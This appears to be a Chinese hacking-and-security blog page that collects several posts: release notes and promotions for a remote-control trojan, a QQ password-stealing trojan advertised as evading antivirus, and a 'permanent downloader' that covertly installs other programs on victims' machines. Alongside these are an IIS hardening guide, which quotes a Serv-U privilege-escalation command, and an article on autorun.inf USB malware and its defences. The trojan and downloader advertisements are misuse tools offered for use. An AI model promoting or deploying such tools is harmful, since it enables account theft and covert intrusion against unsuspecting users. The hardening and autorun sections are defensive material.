上兴远程控制2007sp2正式版 Build0501 :

本次更新：
1 优化升级屏幕传输，占用资源少,传输快
2 优化视频监视，支持多视频源
3 修正2K系统插入的BUG
4 增加一选项，修改日期过主动
5 加密配置上线域名、防问地址

sp2版本屏幕传输不兼容以前版本
也就是说要重新配置生成服务端
点我下载

如果一台及其安装18种杀毒软件，那个系统就什么也不用干了，可以开机都是幸运了。但是，现在的杀毒软件也很令人伤心，似乎没有什么特别好的，总是存在这样那样的遗憾，而且占用资源，所以我裸奔(我的防毒经历:从“武装到牙齿”到“裸奔”)。
虽然笔者上的都是正规站点，但也难免有时候会中些木马之类的，因为下载文件总是有风险的。

如果可以同时使用18中杀毒软件检查文件是否含毒如何？而且还不能收费……哈哈，还真有这样的解决方案！

　　如上图所示，其中就含有18中杀毒软件，在线提供，只要将你的文件上传扫描即可。经过测试，笔者上传了7.8MB的Sogou_pinyin_3b1.exe文件还是很快的，就是

[阅读全文]

过QQ最新补丁，完美截取QQ2007版密码

过瑞星、金山、卡巴、江民、Mcofee、诺顿等杀毒软件最新版的免杀

同时避过QQ自带杀毒功能！！

推荐大家使用asp收信,因为目前大多数杀毒软件都禁止系统自动发Email,所以经常有收不到信的情况.

下载者功能(使需要挂多种木马的用户可以随心所欲)

增加获取中马机器的IP地理位置

通杀所有QQ版本的安全锁防护,中马后QQ登陆框不会出现红叉（包括2007 Beta1）
兼容以前各个版本,并支持飘云版和珊蝴虫版. 密码框不会出现红叉，木马无进程,无启动项。

下载者功能用法:直接把要下载到别人机器上的EXE程序的URL填上就可以了

注

[阅读全文]

上次的1.2版支持72种壳.这次1.3支持92种壳.而且附件中还有一个汉化版本!

:: RL!dePacker is tested with 92+ packers:
aUS [Advanced UPX Scrambler] 0.4 - 0.5
ASPack 1.x - 2.x
AHPack 1.x
AlexProtector 1.x
ARMProtector 0.x
BamBam 0.x
BJFNT 1.3
BeRoEXEPacker 1.x
CryptoPeProtector 0.9x
CodeCrypt 0.16x
dot Fake Signer 3.x

[阅读全文]

Dr.Web v4.33.3.03260(更新汉化补丁+升级器)
一种新型的基因式扫描杀毒软件。可以预防并清除22000种以上的病毒及特洛伊木马，其中包括各种高复杂多变异型的病毒。曾在1994年做为第一个可以根除OneHalf病毒的杀毒软件而享誉欧洲。Dr.Web可以对各类 Word病毒做出快速反应，并进行隔离和清楚。

Dr.Web® for Windows main components:
* The Dr.Web® scanner with graphical interface - It scans the selected by a user objects

[阅读全文]

软件名称：永久下载者

版本更新：070508

服务端大小：19KB


软件功能：集　《多项下载》　和　《定时下载》　于一身，外加　随机双进程　守护。


多项下载：一次性下载，为普通下载，提供 4 项下载，服务端运行 15 秒后开始下载。


定时下载：可自行指定 4 - 8 分钟读取一次指定 TXT 文件，按照 TXT 里设定的连接进行下载。


推荐使用定时下载－－这样即可重启电脑后继续下载，程序已屏蔽大量杀软，重启即可继续下载。


注意事项：TXT 里的下载连接，只可写在 TXT 第一行，不可换行。为了节约服务器资源，一个连接

　　　　　　
　　　　　只下载一次(只要改变 TXT 里的连接,即会在次下载运行)，重启电脑，重新运行服务端除外。

点我进入下载

下面是代码：

功能介绍:
无进程.无服务.无连接.无启动项.无端口.无注册表项
运行环境:
只能安装在win2003上.
安装方式:
远程3389下安装必须使用计划任务. at 方式.其他远程控制方式双击就可以了

点我下载

1.为了打造一个安全的虚拟主机,在asp+SQL环境下,我们要做的是封杀ASP webshell.封杀serv-u提权漏洞和SQL注入的威胁

2.默认安装的win主机上webshell功能十分强大,我们要封杀webshell的哪些功能 也就是不让webshell查看系统服务信息,执行cmd命令和略览文件目录,我们要实现的功能是每个用户只能访问自己的目录,而且可以用FSO等ASP组件,在这里我以海洋木马和win200为例给大家演示一下.好多资料都是网上收集而来,在这表示感谢.

3.现在我们先设置好win的目录访问权限 设置所有分区为administrator SYSTEM这两个系统用户拥有所有权、删除ERVERYONE
具体操作方式：选择系统盘我们这里为C->按右键选择属性-安全添加一个administrator和SYSTEM所有权限，删除ERVERYONE用户
　我已经都设置过了,就不重复了,设置权限的时候很慢,具体的看我下面的说明吧

4.选择重置所有子对象的权限并允许传播可继承权限
具体操作方式：接第3步->选择高级->选择重置所有子对象的权限并允许传播可继承权限打钩选定按应用->提示是否继续选择‘是’继续
　　　　　　　如果发现有提示问题就按继续按钮继续

5.设置everyone用户可以读取的目录（使得可以执行PERL ASP JMAIL）
[设置ASP可以使用]具体操作：进入C:promgram files目录 把common files目录，设置everyone可以读、运行、列目录
C:Program FilesCommon Files 都是一些系统文件,如果你装了一些别的组件,比如maill,php等 也按同样的设置
　就是刚才那个目录,系统出了毛病,设置权限的时候十分慢

6.设置取消继承，功能：为了使用户不能越权删除而ASP可以正常使用
具体操作方式：进入winntsystem32选中所有目录，除了inetsrv certsrv 两个目录不要选择（备注：这两个是ASP要用的dll)
　　　　　　　选择属性->安全->高级->权限->把允许来自父系的继承取消打钩->按复制
　　　　　　　
　　　　　　　进入winnt目录->选中所有目录 除web, temp, tasks, system32　,offine web pages ,
　　　　　　　iis temporay compressed file ,help,download promgram 同上取消继承->按复制

　　　 选择winnt->设置安全，添加everyone 读取运行 列出文件目录 读取
　　　
　　　 进入winnt->选择temp属性设置安全 ,everyone完全控制,再点高级,编辑,把运行权限去掉
动画断了,奇怪了
这样2000目录权限基本设置完成,2003的目录设置可以看最下面,我就是这么设置的,没出问题,有问题找我,看来还没设置好,终于好了,累啊
D盘看不见了吧.

7.刚才动画断了,新建一个用户leilei,设置密码,要设置密码永不过期,把他加到guest用户组里去,然后在IIS设置他的虚拟站点,我这用的是默认站点,设置虚拟目录E:网站资源\BBSXP 5.12 正式版 ]bsxp,再点属性-目录安全性-编辑.匿名访问打上勾,然后设置用户名和密码,然后到E:网站资源\BBSXP 5.12 正式版 ]bsxp里设置权限,给leilei访问权.OK,现在告了一段落,leilei这个用户只能访问自己的目录了删掉不用的脚本映射.*.htr这是一个比较厉害的文件，删掉好了。否则，任何人都可以通过你的web来进行非法操作，甚至格式化 掉你的硬盘。 *.hta 删掉吧。 *.idc 所以删掉他。 *.printer这个是打印机文件。去掉他好了 *.htw , *.ida *.idq这些都是索引文件，可以去掉了。 其实只要有用的保留,比如asp,asa,php,cgi,给保留着,其它全部删除就行啦!!!:)
我们来看一下网站
　怎么样,FSO正常使用吧
8. 这里有时候会遇见ASP不能访问,提示The requested resource is in use和The remote procedure call failed and did not execute.
　 我就遇见了,找了找网上的帖子,有的说御载瑞星2005,再同步iwam帐号,同步同步iwam帐号请看　　http://www.gamepa.com/Announce/Announce.asp?BoardID=8000&ID=361.有的说是asp.net没有权限执行,还有的说在2003下,添加IIS_WPG　 组，并重启计算机。方正我是同步了一下iwam帐号,然后还是没搞定,又瞎鼓捣了半天,准备从装机器前从起了一下,然后发现,好了~,如果你　 遇见了这个问题,而且没搞定的话,可以到我论坛里发个帖说一下,我和你一起研究,反正我是无业游民,电脑前面做了半年了.随时都在,急就　 端消息我,有声音提示的.


9.现在我们上个webshell看看,先看我们刚才设置的目录权限的效果,效果不错,现在我们堵上webshell的cmd ,有两种cmdshell WScript.Shell和Shell.Application,关于这两个组件的基础知识可以看看这篇文章
http://www.gamepa.com/Announce/Announce.asp?BoardID=8000&ID=395
　 这里有两种方法 一种是设置权限把c:winntsystem32cmd.exe 的权限设置好,(sorry 我把mdshell WScript.Shell和Shell.Application已经删了,现在注册上),只能administrator和系统用户访问的权限,这个时候cmd是不能用了,不过我们平时都是上传一个cmd在用,看演示看,现在又能用了吧,我在别人的主机上也经常遇见这个现象,不过我们还是有办法.再把E:网站资源\BBSXP 5.12 正式版 ]bsxp的运行权限去掉,拒绝访问。 缺少对象,不影响网站使用fso吧,还有一一种就是彻底删掉WScript.Shell和Shell.application ,命令是regsvr32/u wshom.ocx和regsvr32/u wshext.dll,我们先恢复权限.还是缺少对象吧,两个都行,都是实验通过的,我比较喜欢第二种,反正不影响我使用.再去试下网站,没有问题

10.封杀webshell 查看系统进程的功能,对我的电脑点右键-管理-服务应用程序-服务-workstation,双击点停止,禁用.这个服务在倒数第二个
　Workstation”——svchost.exe——是用来管理网络，支持联网和打印/文件共享的,禁用了也没事,参考文章
　http://www.gamepa.com/Announce/Announce.asp?BoardID=8000&ID=400
　http://www.gamepa.com/Announce/Announce.asp?BoardID=8000&ID=402
　http://www.gamepa.com/Announce/Announce.asp?BoardID=8000&ID=403
　错误:　错误源:　这好象是因为删除wshom.ocx和wshext.dll的原因,不管他,我们继续,现在是可以看系统进程的还有登陆用户,现在我们禁用服务去,要从起,进程才会没的,算了,我不从起了,反正不会有问题的了,已经什么也看不见了

11.封杀serv-u和SQL,这也是抄来的,因为serv-u和sql都是系统权限,也就是system用户,我们的目的就是把他俩变成user用户,让他俩没权限添加administrator的帐号,这里我用serv-u演示,ftp "net user leilei3 leilei3 /add" 成功添加了leilei2帐号,输入法出问题了，估计大家也都知道，serv-u本地提权漏洞，解决方法,先添加一个user权限的用户,我这就用leilei３这个用户了,然后对对我的电脑点右键-管理-服务应用程序-服务-Serv-U FTP 服务器-登陆-此帐户,把默认的改掉,现在就可以了,来我们再试一下serv-u能不能用.无法启动，晕到,还是权限的问题,有人做过这个动画,没问题的.
动画下载http://www.gamepa.com/Announce/Announce.asp?BoardID=7890&ID=355
权限设一下就OK了,SQL也是这样的设置,不过权限要设置好,因为sql要访问的目录很多,没操作权限就不能用了,建议要改user权限运行SQL的时候别用我上面讲的目录权限分配方法,而是根据最下面的win2003目录权限设置做参考,一点一点的改win的目录权限,或者给user用户多点权限,这个我用不上,也没研究,还那句话,如果有哪位朋友需要,我们一起研究

12.经过这样的设置基本安全了吧,如果高手能提供点意见,指出不安全的地方,不胜感激

13.第一次做动画,不知道做的怎么样,有不周的地方,见谅.还有大家最好别黑别人的机器,己所不欲,勿施于人.一切都是为了学习,还有就是我希望大家做动画的时候尽量的兼顾说一下原理,授人以鱼,不如授人以渔,如果太长了,给个链接也好啊.

本文来自网络
作者：不详

“RavMonE.exe"、"rose.exe"、"sxs.exe"、 "copy.exe"、"setup.exe"...根目录下的神秘幽灵，系统安全的杀手，它们被称作“U盘病毒”。无数Windows用户，都在为它们 而焦头烂额。这一篇文章是一篇对自己对U盘病毒的研究和与U盘病毒斗争的经验教训的总结。

Windows 95以后的系统都有一个“自动运行”的功能。通过在卷插入时读取磁盘卷上的Autorun.inf文件来获得Explorer中卷的自定义图标和对卷图标 的上下文菜单进行修改，并对某些媒体自动运行Autorun.inf中定义的可执行文件。05年以后，随着各种可移动存储设备的普及，国内有些黑客制作了 盗取U盘内容并将自身复制到U盘利用Autorun.inf传播的病毒。著名的伪ravmon、copy+host、sxs、Viking、熊猫烧香等著 名病毒都有这种传播方式。它们有时是根目录下的神秘幽灵，有时是出现在不应该出现的地方的回收站，总之，它们是系统安全的严重威胁。

Autorun.inf被病毒利用一般有4种方式

1.
OPEN=filename.exe
自动运行。但是对于很多XPSP2用户和Vista用户，Autorun已经变成了AutoPlay，不会自动运行它，会弹出窗口说要你干什么。

2.
shellAutocommand=filename.exe
shell=Auto
修改上下文菜单。把默认项改为病毒的启动项。但此时只要用户在图标上点击右键，马上发现破绽。精明点的病毒会改默认项的名字，但如果你在非中文的系统下发现右键菜单里多出了乱码或者中文，你会认为是什么呢？

3.
shellexecute=filename.exe
ShellExecute=....只要调用ShellExecuteA/W函数试图打开U盘根目录，病毒就会自动运行。这种是对付那些用Win+R输盘符开盘的人。

4.
shellopen=打开(&O)
shellopenCommand=filename.EXE
shellopenDefault=1
shellexplore=资源管理器(&X)

这种迷惑性较大，是新出现的一种形式。右键菜单一眼也看不出问题，但是在非中文的系统下，原形毕露。突然出现的乱码、中文当然难逃法眼。
面对这种危险，尤其是第四种，仅仅依靠Explorer本身，已经很难判断可移动磁盘是否已经中毒。而在这种情况下，一部分人也根据自己的经验，做出了“免疫”工具。
免疫的办法（对可移动磁盘和硬盘）

1、同名目录

目录在Windows下是一种特殊的文件，而两个同一目录下的文件不能同名。于是，新建一个目录“autorun.inf"在可移动磁盘的根目录，可以防止早期未考虑这种情况存在的病毒创建autorun.inf，减少传播成功的概率。

2、autorun.inf下的非法文件名目录

有些病毒加入了容错处理代码，在生成autorun.inf之前先试图删除autorun.inf目录。
在Windows NT Win32子系统下，诸如"filename."这样的目录名是允许存在的，但是为了保持和DOS/Win9x的8.3文件系统的兼容性（.后为空非 法），直接调用标准Win32 API中的目录查询函数是无法查询这类目录中的内容的，会返回错误。但是，删除目录必须要逐级删除其下的整个树形结构，因此必须查询其下每个子目录的内 容。因此，在“autorun.inf"目录建一个此类特殊目录，方法如"MD x:autorun.infyksoft.."，可以防止autorun.inf目录轻易被删除。类似的还有利用Native API创建使用DOS保留名的目录（如con、lpt1、prn等）也能达到相似的目的。

3、NTFS权限控制

病毒制造 者也是黑客，知道Windows的这几个可算是Bug的功能。他们可以做一个程序，扫描目录时发现某目录名最后一个字节为'.'则通过访问 "dirfullname.."、或者通过利用Windows NT的Native API中的文件系统函数直接插手，删除该特殊目录。

因此，基于更低层的文件系统权限控制的办法出现了。将U盘、移动硬盘格式化为NTFS文件系统，创建Autorun.inf目录，设置该目录对任何用户都没有任何权限，病毒不仅无法删除，甚至无法列出该目录内容。

但是，该办法不适合于音乐播放器之类通常不支持NTFS的设备。

这三步可谓是一步比一步精彩。但是，最大的问题不在怎么防止生成这个autorun.inf上，而是系统本身、Explorer的脆弱性。病毒作者很快就会做出更强大的方案。这是我的预想。

1、 结合ANI漏洞，在autorun.inf里将icon设成一个ANI漏洞的Exploit文件（经过我的实验，发现Windows有一种特性，就算把 ani扩展名改为ico，还是可以解析出图标），这样只要一打开“我的电脑”，未打补丁、无杀软的系统就会直接遭殃。这样的东西还可以放到网上的各种资源 ISO中。

2、提高病毒的整体编程水平，综合以上各种反免疫方式，另外利用多数国内windows用户常以高权限登录系统的特点，自动将没有权限的Autorun.inf目录获得所有权、加读写删除权限，击破这最坚固的堡垒。

面对如此恐怖的东西，对付的办法已经不多了。但是它们其实是一切windows安全问题的基本解决方案，

1、一定要将系统和安全软件保持在最新状态。即使是盗版用户，微软也不会不给重要级别的安全更新，也从来没有过在重要级别安全更新中加入反盗版程序的记录。

2、尽量以受限制的帐户使用系统和上网，这样可以减少病毒进入系统的概率。Vista之所以加入UAC功能，正是因为它能够使用户在尽量方便的同时，享受到受限用户的安全。

3、 某种程度上，可以说QQ、IE和某些装备能换真钱、什么都要真钱的网游是导致大量病毒木马编写者出现的“万恶之源”。通过IE漏洞，制作网页木马，安装盗 号程序，盗取账号，获得人民币。这条黑色产业链中，IE其实是最容易剪断的一环。珍爱系统，系统一定要更新，要有能防止网页木马的杀毒软件，用IE不要乱 上各种小型下载站、色情网站等高危站点，如果有可能，使用非IE引擎的浏览器。

4、恶意捆绑软件，现在越来越和病毒木马接近。部分恶意软件的FSD HOOK自我防御程序可能被病毒利用来保护自己（如SONY XCP事件），而一些恶意软件本身就是一个病毒木马的下载器。因此，不要让流氓接近你的机器。

Autorun.inf的攻防战还在继续，只会变得越来越精彩，网民的安全意识会在攻与防的对立与统一中获得突破性的进展。